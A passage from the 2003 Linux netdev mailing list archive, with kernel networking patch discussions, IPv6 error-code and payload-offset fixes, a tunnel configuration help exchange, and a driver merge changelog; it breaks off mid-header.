linux-net@vger.kernel.org, kuznet@ms2.inr.ac.ru Subject: Re: [PATCH] Prefix List against 2.5.70 (re-done) References: <20030627.144752.78715628.davem@redhat.com> <20030628.130602.63704890.yoshfuji@linux-ipv6.org> <3F008771.5030206@us.ibm.com> <20030702.091825.72842784.yoshfuji@linux-ipv6.org> In-Reply-To: <20030702.091825.72842784.yoshfuji@linux-ipv6.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3912 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > You do not explain why we (or kernel) NEED(s) this. 
> It is not so important how SMALL it is
> though it may cause problems how LARGE it is.

I had explained the reasons for having a prefix list i/f in my previous mail. To recap:

- Users don't need to know what the definition of a prefix is; all they have to do is ask the kernel and get the list. Otherwise different user apps will have to know the definition of a prefix and parse the entries themselves. The parsing is non-trivial (e.g. the address should not be LL or MC, there should be no nexthop and it should be added via an RA, etc).
- The kernel code to get the prefix list is small: the top-level inet6_dump_fib uses either dump_node or dump_prefix, the latter being the new user interface. Having a user interface makes it easier to get the prefix list without significant bloat to the kernel.

> This is design issue; how we should provide L3 per-interface
> information to userspace; eg. in_device and/or inet6_dev things
> including per-interface statistics.
>
> Since I think it is not appropriate to provide per-interface
> statistics via RTM_xxxROUTE, so I don't agree to provide
> the RA information (i.e. Manage/Otherconf Flags) via
> RTM_xxxROUTE.
>
> Options:
> - use RTM_xxxLINK for L3 operation
> - introduce RTM_xxxIFACE for L3 per-interface operations

Yes, there are a couple of different ways to do this. One is as you have suggested, but there is a problem with it: the existing RTM_GETLINK interface returns very generic elements of the dev (mtu, hardware address, dev statistics), while the change you suggested is specific to IPv6. I am not sure this is a good design to implement. Either we could use the current (submitted) way, or use a different RTM_GETADDR interface in inet6_fill_ifaddr (and introduce RTM_IFACEFLAGS). This will be specific to IPv6. Are you agreeable to this?

> Well, on moving forward; you can split your patch up to 3 things:
> 1. fix routing flags
> 2. provide Managed/Otherconf flags API
> (3.
provide the prefix list API (if it IS required)) > > I'm not against the first item. > We need to discuss on the design related to the 2nd item. > I don't think that we really need 3rd item. - I am ok with 1 :-) - I have suggested changes for 2, please let me know what you think, whether we can go with the old way or make the change suggested above. - I believe we need #3 for the reasons given above. Thanks, - KK From jgarzik@pobox.com Thu Jul 10 15:40:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 15:40:35 -0700 (PDT) Received: from www.linux.org.uk (IDENT:5kp1wT94CwjrkUhuLQy1tBbkPHBHdG9m@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AMeQ2x023497 for ; Thu, 10 Jul 2003 15:40:28 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19ak5P-0004nO-3P; Thu, 10 Jul 2003 23:40:25 +0100 Message-ID: <3F0DEB4B.7040101@pobox.com> Date: Thu, 10 Jul 2003 18:40:11 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Stephen Hemminger CC: Jay Schulist , netdev@oss.sgi.com Subject: Re: [PATCH 2.5.74] Change appletalk/cops to dynamic allocation of net_device References: <20030709132910.589cf65d.shemminger@osdl.org> In-Reply-To: <20030709132910.589cf65d.shemminger@osdl.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3913 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev viro did this one... 
From jgarzik@pobox.com Thu Jul 10 15:40:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 15:40:55 -0700 (PDT) Received: from www.linux.org.uk (IDENT:qbDKeNZrmQm5yEbjha1NB9G1vd071C7A@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AMen2x023550 for ; Thu, 10 Jul 2003 15:40:49 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19ak5o-0004nh-83; Thu, 10 Jul 2003 23:40:48 +0100 Message-ID: <3F0DEB65.20806@pobox.com> Date: Thu, 10 Jul 2003 18:40:37 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Stephen Hemminger CC: Jay Schulist , netdev@oss.sgi.com Subject: Re: [PATCH 2.5.74] convert appletalk/ltpc over to dynamic allocation References: <20030709132438.432fcd2b.shemminger@osdl.org> In-Reply-To: <20030709132438.432fcd2b.shemminger@osdl.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3914 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev viro did this one too... 
ftp://ftp.linux.org.uk/pub/people/viro/ From jgarzik@pobox.com Thu Jul 10 15:42:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 15:42:56 -0700 (PDT) Received: from www.linux.org.uk (IDENT:3xpceegHnb6QZV89SITKn5u2s3mlGXCM@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AMgq2x024117 for ; Thu, 10 Jul 2003 15:42:52 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19ak7n-00051n-25; Thu, 10 Jul 2003 23:42:51 +0100 Message-ID: <3F0DEBE0.9030309@pobox.com> Date: Thu, 10 Jul 2003 18:42:40 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Stephen Hemminger CC: Jay Schulist , netdev@oss.sgi.com, linux-atalk@lists.netspace.org Subject: Re: [PATCH 2.5.74] convert appletalk/ipddp to dynamic allocation References: <20030709131334.79df4dca.shemminger@osdl.org> In-Reply-To: <20030709131334.79df4dca.shemminger@osdl.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3915 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Stephen Hemminger wrote: > + > + if((err = register_netdev(dev_ipddp))) > + kfree(dev_ipddp); style otherwise, ok. 
From jgarzik@pobox.com Thu Jul 10 15:44:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 15:44:26 -0700 (PDT) Received: from www.linux.org.uk (IDENT:C88UjqQzPLNwoiRhvHcnFKqlufCnUkHo@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AMiL2x024424 for ; Thu, 10 Jul 2003 15:44:22 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19ak9F-00057s-10; Thu, 10 Jul 2003 23:44:21 +0100 Message-ID: <3F0DEC3A.9070901@pobox.com> Date: Thu, 10 Jul 2003 18:44:10 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Stephen Hemminger CC: netdev@oss.sgi.com Subject: Re: [PATCH] convert plip to alloc_netdev References: <20030708151742.715ca49c.shemminger@osdl.org> In-Reply-To: <20030708151742.715ca49c.shemminger@osdl.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3916 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev applied From jgarzik@pobox.com Thu Jul 10 15:45:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 15:46:00 -0700 (PDT) Received: from www.linux.org.uk (IDENT:S1fsYb6R6tHVH/C4Lw+9cKjv5pLQypHk@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AMju2x024734 for ; Thu, 10 Jul 2003 15:45:56 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19akAk-00058b-JG; Thu, 10 Jul 2003 23:45:54 +0100 Message-ID: <3F0DEC97.2040301@pobox.com> Date: Thu, 10 Jul 2003 18:45:43 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 
Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Stephen Hemminger CC: netdev@oss.sgi.com Subject: Re: [PATCH] (dgrs) References: <20030708151606.483604ad.shemminger@osdl.org> In-Reply-To: <20030708151606.483604ad.shemminger@osdl.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3917 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev applied From tgr@reeler.org Thu Jul 10 16:32:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 16:32:49 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ANWb2x026242 for ; Thu, 10 Jul 2003 16:32:38 -0700 Received: by reeler.org id 19aktj-0008Vt-00 ; Fri, 11 Jul 2003 01:32:23 +0200 Date: Fri, 11 Jul 2003 01:32:23 +0200 From: Thomas Graf To: davem@redhat.com Cc: netdev@oss.sgi.com, tgraf@suug.ch Subject: [PATCH] make sendmsg return EDESTADDRREQ if socket is not connected and daddr was not specified Message-ID: <20030710233223.GA30577@rei.rakuen> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-Encryption: "Encrypted with ROT13 using key 42" X-archive-position: 3918 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev Hello Another 1003.1 fix: [EDESTADDRREQ] The socket is not connection-mode and does not have its peer address set, and no destination address was specified. 
fixes sendmsg in ipv{4,6}/{raw,udp}

-- thomas

Index: net/ipv4/raw.c
===================================================================
RCS file: /cvs/tgr/linux-25/net/ipv4/raw.c,v
retrieving revision 1.1.1.2
diff -u -r1.1.1.2 raw.c
--- net/ipv4/raw.c	10 Jul 2003 22:58:45 -0000	1.1.1.2
+++ net/ipv4/raw.c	10 Jul 2003 23:18:04 -0000
@@ -383,7 +383,7 @@
 		 * IP_HDRINCL is much more convenient.
 		 */
 	} else {
-		err = -EINVAL;
+		err = -EDESTADDRREQ;
 		if (sk->sk_state != TCP_ESTABLISHED)
 			goto out;
 		daddr = inet->daddr;
Index: net/ipv4/udp.c
===================================================================
RCS file: /cvs/tgr/linux-25/net/ipv4/udp.c,v
retrieving revision 1.1.1.1
diff -u -r1.1.1.1 udp.c
--- net/ipv4/udp.c	9 Jul 2003 18:42:29 -0000	1.1.1.1
+++ net/ipv4/udp.c	10 Jul 2003 23:18:04 -0000
@@ -540,7 +540,7 @@
 			return -EINVAL;
 	} else {
 		if (sk->sk_state != TCP_ESTABLISHED)
-			return -ENOTCONN;
+			return -EDESTADDRREQ;
 		daddr = inet->daddr;
 		dport = inet->dport;
 		/* Open fast path for connected socket.
Index: net/ipv6/raw.c
===================================================================
RCS file: /cvs/tgr/linux-25/net/ipv6/raw.c,v
retrieving revision 1.1.1.2
diff -u -r1.1.1.2 raw.c
--- net/ipv6/raw.c	10 Jul 2003 22:58:50 -0000	1.1.1.2
+++ net/ipv6/raw.c	10 Jul 2003 23:18:04 -0000
@@ -602,7 +602,7 @@
 		fl.oif = sin6->sin6_scope_id;
 	} else {
 		if (sk->sk_state != TCP_ESTABLISHED)
-			return(-EINVAL);
+			return -EDESTADDRREQ;
 		proto = inet->num;
 		daddr = &np->daddr;
Index: net/ipv6/udp.c
===================================================================
RCS file: /cvs/tgr/linux-25/net/ipv6/udp.c,v
retrieving revision 1.1.1.1
diff -u -r1.1.1.1 udp.c
--- net/ipv6/udp.c	9 Jul 2003 18:42:35 -0000	1.1.1.1
+++ net/ipv6/udp.c	10 Jul 2003 23:18:04 -0000
@@ -862,7 +862,7 @@
 		fl.oif = sin6->sin6_scope_id;
 	} else {
 		if (sk->sk_state != TCP_ESTABLISHED)
-			return -ENOTCONN;
+			return -EDESTADDRREQ;
 		up->dport = inet->dport;
 		daddr = &np->daddr;

From hogarth@theirongiant.lochness.weebeastie.net Thu Jul 10 16:39:59 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 16:40:03 -0700 (PDT)
Received: from nessie.weebeastie.net (nessie.weebeastie.net [61.8.7.205]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ANdt2x026607 for ; Thu, 10 Jul 2003 16:39:57 -0700
Received: from theirongiant.lochness.weebeastie.net (theirongiant.lochness.weebeastie.net [10.1.1.2]) by nessie.weebeastie.net (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6ANdOg6002434 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=FAIL); Fri, 11 Jul 2003 09:39:24 +1000
Received: from theirongiant.lochness.weebeastie.net (localhost [127.0.0.1]) by theirongiant.lochness.weebeastie.net (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6ANdW4u017705 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Fri, 11 Jul 2003 09:39:32 +1000
Received: (from hogarth@localhost) by theirongiant.lochness.weebeastie.net (8.12.3/8.12.3/Debian-6.4) id h6ANdV23017704; Fri, 11 Jul 2003 09:39:31 +1000
Date: Fri, 11 Jul
2003 09:39:31 +1000 From: CaT To: Mika Liljeberg Cc: yoshfuji@linux-ipv6.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, pekkas@netcore.fi Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked Message-ID: <20030710233931.GG1722@zip.com.au> References: <20030710154302.GE1722@zip.com.au> <1057854432.3588.2.camel@hades> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1057854432.3588.2.camel@hades> User-Agent: Mutt/1.3.28i Organisation: Furball Inc. X-archive-position: 3919 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cat@zip.com.au Precedence: bulk X-list: netdev On Thu, Jul 10, 2003 at 07:27:13PM +0300, Mika Liljeberg wrote: > On Thu, 2003-07-10 at 18:43, CaT wrote: > > ip tunnel add sit1 mode sit remote 138.25.6.14 > > ip link set sit1 up > > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 > > ip route add ::/0 via 3ffe:8001:000c:ffff::36 > > RTNETLINK answers: Invalid argument > > Try this: > > ip route add ::/0 dev sit1 That didn't complain but pings to the ext gw were broken. Noticed the route contained: 3ffe:8001:c:ffff::36/127 via :: dev sit1 proto kernel metric 256 mtu 1480 adv mss 1420 And having remembered /127 being mentioned as bad I changed the interface config to a netmask of /64. Dropped it and brought it up and it all works. There's something fundamental about ipv6 netmasks that I just don't understand... -- "How can I not love the Americans? They helped me with a flat tire the other day," he said. 
- http://www.toledoblade.com/apps/pbcs.dll/artikkel?SearchID=73139162287496&Avis=TO&Dato=20030624&Kategori=NEWS28&Lopenr=106240111&Ref=AR From tgr@reeler.org Thu Jul 10 16:45:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 16:45:22 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ANjH2x026936 for ; Thu, 10 Jul 2003 16:45:18 -0700 Received: by reeler.org id 19al5l-00009D-00 ; Fri, 11 Jul 2003 01:44:49 +0200 Date: Fri, 11 Jul 2003 01:44:49 +0200 From: Thomas Graf To: davem@redhat.com, jmorris@intercode.com.au, yoshfuji@linux-ipv6.org Cc: netdev@oss.sgi.com, tgraf@suug.ch Subject: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} Message-ID: <20030710234449.GB30577@rei.rakuen> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-Encryption: "Encrypted with ROT13 using key 42" X-archive-position: 3920 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev Hello ip6_append_data: The offset in the datagram where the payload gets copied to (transhdrlen) is not calculated correctly: the size of frag opts {dst1opt|auth} is not taken into account. This lead to overwritten payload by frag opts. yoshfuji agreed on this. patch is against 2.5.75 -- thomas Index: net/ipv6/ip6_output.c =================================================================== RCS file: /cvs/tgr/linux-25/net/ipv6/ip6_output.c,v retrieving revision 1.1.1.2 diff -u -r1.1.1.2 ip6_output.c --- net/ipv6/ip6_output.c 10 Jul 2003 22:58:50 -0000 1.1.1.2 +++ net/ipv6/ip6_output.c 10 Jul 2003 23:36:48 -0000 @@ -1247,11 +1247,9 @@ inet->cork.length = 0; inet->sndmsg_page = NULL; inet->sndmsg_off = 0; - if ((exthdrlen = rt->u.dst.header_len) != 0) { - length += exthdrlen; - transhdrlen += exthdrlen; - } - exthdrlen += opt ? 
opt->opt_flen : 0; + exthdrlen = rt->u.dst.header_len + opt ? opt->opt_flen : 0; + length += exthdrlen; + transhdrlen += exthdrlen; } else { rt = np->cork.rt; if (inet->cork.flags & IPCORK_OPT) From garzik@gtf.org Thu Jul 10 16:55:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 16:55:31 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ANtO2x027285 for ; Thu, 10 Jul 2003 16:55:24 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 8FD586662; Thu, 10 Jul 2003 19:55:18 -0400 (EDT) Date: Thu, 10 Jul 2003 19:55:18 -0400 From: Jeff Garzik To: torvalds@osdl.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: [BK PATCHES] more net driver merges Message-ID: <20030710235518.GA16507@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 3921 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Linus, please do a bk pull bk://kernel.bkbits.net/jgarzik/net-drivers-2.5 Others may download ftp://ftp.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.5/2.5.75-netdrvr1.patch.bz2 This will update the following files: drivers/net/appletalk/cops.c | 5 - drivers/net/appletalk/ltpc.c | 5 - drivers/net/declance.c | 2 drivers/net/dgrs.c | 27 +++---- drivers/net/e100/e100_main.c | 32 +++----- drivers/net/e100/e100_phy.c | 2 drivers/net/hamradio/mkiss.c | 141 +++++++-------------------------------- drivers/net/hamradio/mkiss.h | 2 drivers/net/pcmcia/3c574_cs.c | 2 drivers/net/pcmcia/3c589_cs.c | 2 drivers/net/pcmcia/smc91c92_cs.c | 2 drivers/net/plip.c | 96 ++++++++++++-------------- drivers/net/sb1250-mac.c | 2 drivers/net/sk_mca.c | 2 drivers/net/sundance.c | 10 ++ drivers/net/tg3.c | 5 - drivers/net/tokenring/3c359.c | 2 
 drivers/net/tokenring/proteon.c  |    1
 drivers/net/tokenring/skisa.c    |    1
 drivers/net/via-rhine.c          |    2
 drivers/net/wireless/atmel_cs.c  |   11 +--
 drivers/net/wireless/wavelan.c   |    6 +
 22 files changed, 131 insertions(+), 229 deletions(-)

through these ChangeSets:

(03/07/10 1.1400)
   [netdrvr atmel_cs] kill compiler warning (jumping to "empty" label)

(03/07/10 1.1399)
   [netdrvr wavelan] remove check_region usage

(03/07/10 1.1398)
   [netdrvr] fix compiler warnings in 3c359, proteon, skisa tokenring drivers.

(03/07/10 1.1397)
   [netdrvr tg3] more ULL suffixes to make gcc 3.3 happy

(03/07/10 1.1396)
   [netdrvr dgrs] convert to using alloc_etherdev

(03/07/10 1.1395)
   [PATCH] net/pcmcia fix fast_poll timers (HZ > 100)

   i think we want fast_poll to behave the same with HZ=100 and HZ=1000

(03/07/10 1.1394)
   [PATCH] more net driver timer fixes

   following patch fixes some bogus additions to jiffies (w/o HZ being
   involved)
   - appletalk/cops.c
   - appletalk/ltpc.c
   - declance.c
   - sb1250-mac.c
   - sk_mca.c
   - via-rhine.c
   against 2.5.73-bk

(03/07/10 1.1393)
   [PATCH] mkiss

   Below patch cleans the mkiss driver. After the previous cleanup in
   2.4.0-prerelease various code had become unreachable because nothing
   was ever setting MKISS_DRIVER_MAGIC. This fixes an oops - the mkiss
   pointer was potentially NULL. And it also removes the
   MOD_{INC,DEC}_USE_COUNT calls.

   Alan, lemme know if you want me to cook a 2.4 patch also.

   Patch from Jeroen Vreeken PE1RXQ.

   Ralf

(03/07/10 1.1392)
   [PATCH] convert plip to alloc_netdev

   This converts the parallel network driver to use alloc_netdev instead
   of doing its own allocation.
Tested (load/unload) on 2.5.74 (03/07/10 1.1391) [e100] misc * Allow changing Wake On LAN when EEPROM disabled * Change Log updated * Version changed (03/07/10 1.1390) [e100] cu_start: timeout waiting for cu * Bug fix: 82557 (with National PHY) timeout during init [Adam Kropelin] akropel1@rochester.rr.com (03/07/10 1.1389) [netdrvr sundance] increase eeprom read timeout From mika.liljeberg@welho.com Thu Jul 10 17:04:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:04:20 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B04E2x027700 for ; Thu, 10 Jul 2003 17:04:15 -0700 Received: from hades.pp.htv.fi (localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6B04UZj008015; Fri, 11 Jul 2003 03:04:30 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6B04TQv008014; Fri, 11 Jul 2003 03:04:29 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: CaT Cc: yoshfuji@linux-ipv6.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, pekkas@netcore.fi In-Reply-To: <20030710233931.GG1722@zip.com.au> References: <20030710154302.GE1722@zip.com.au> <1057854432.3588.2.camel@hades> <20030710233931.GG1722@zip.com.au> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1057881869.3588.10.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 03:04:29 +0300 X-archive-position: 3922 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Fri, 2003-07-11 at 02:39, CaT wrote: > And having remembered /127 being mentioned as bad I changed the > interface config to a netmask of /64. Dropped it and brought it > up and it all works. 
> > There's something fundamental about ipv6 netmasks that I just don't > understand... Well, the thing is that prefix:: is a special anycast address that identifies a router on the link prefix::/n, where n is the prefix length. You had configured a 127-bit link prefix, meaning that you had only one valid unicast address (last bit == 1) in addition to the router anycast address (last bit == 0). Normally, IPv6 networks are supposed to use 64-bit on-link prefixes but the implementation can be written in such a way that other prefix lengths can be configured. Setting your tunnel prefix to /64 is certainly the right thing to do. MikaL From yoshfuji@linux-ipv6.org Thu Jul 10 17:16:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:17:04 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0Gm2x028163 for ; Thu, 10 Jul 2003 17:16:53 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B0IEBo003849; Fri, 11 Jul 2003 09:18:14 +0900 Date: Fri, 11 Jul 2003 09:18:14 +0900 (JST) Message-Id: <20030711.091814.128467921.yoshfuji@linux-ipv6.org> To: tgraf@suug.ch, davem@redhat.com, jmorris@intercode.com.au Cc: netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030710234449.GB30577@rei.rakuen> References: <20030710234449.GB30577@rei.rakuen> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 
Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3923 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030710234449.GB30577@rei.rakuen> (at Fri, 11 Jul 2003 01:44:49 +0200), Thomas Graf says: > yoshfuji agreed on this. I agreed, but > - exthdrlen += opt ? opt->opt_flen : 0; > + exthdrlen = rt->u.dst.header_len + opt ? opt->opt_flen : 0; Well, sorry, this was wrong. D: fix offset of payload with extension header. D: based on patch from Thomas Graf Index: linux-2.5/net/ipv6/ip6_output.c =================================================================== RCS file: /home/cvs/linux-2.5/net/ipv6/ip6_output.c,v retrieving revision 1.33 diff -u -r1.33 ip6_output.c --- linux-2.5/net/ipv6/ip6_output.c 9 Jul 2003 05:55:17 -0000 1.33 +++ linux-2.5/net/ipv6/ip6_output.c 10 Jul 2003 22:50:33 -0000 @@ -1247,11 +1247,9 @@ inet->cork.length = 0; inet->sndmsg_page = NULL; inet->sndmsg_off = 0; - if ((exthdrlen = rt->u.dst.header_len) != 0) { - length += exthdrlen; - transhdrlen += exthdrlen; - } - exthdrlen += opt ? opt->opt_flen : 0; + exthdrlen += rt->u.dst.header_len + (opt ? 
opt->opt_flen : 0); + length += exthdrlen; + transhdrlen += exthdrlen; } else { rt = np->cork.rt; if (inet->cork.flags & IPCORK_OPT) --yoshfuji From yoshfuji@linux-ipv6.org Thu Jul 10 17:23:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:23:19 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0N72x028530 for ; Thu, 10 Jul 2003 17:23:08 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B0OZBo003995; Fri, 11 Jul 2003 09:24:35 +0900 Date: Fri, 11 Jul 2003 09:24:35 +0900 (JST) Message-Id: <20030711.092435.64560380.yoshfuji@linux-ipv6.org> To: tgraf@suug.ch, davem@redhat.com, jmorris@intercode.com.au Cc: netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030711.091814.128467921.yoshfuji@linux-ipv6.org> References: <20030710234449.GB30577@rei.rakuen> <20030711.091814.128467921.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 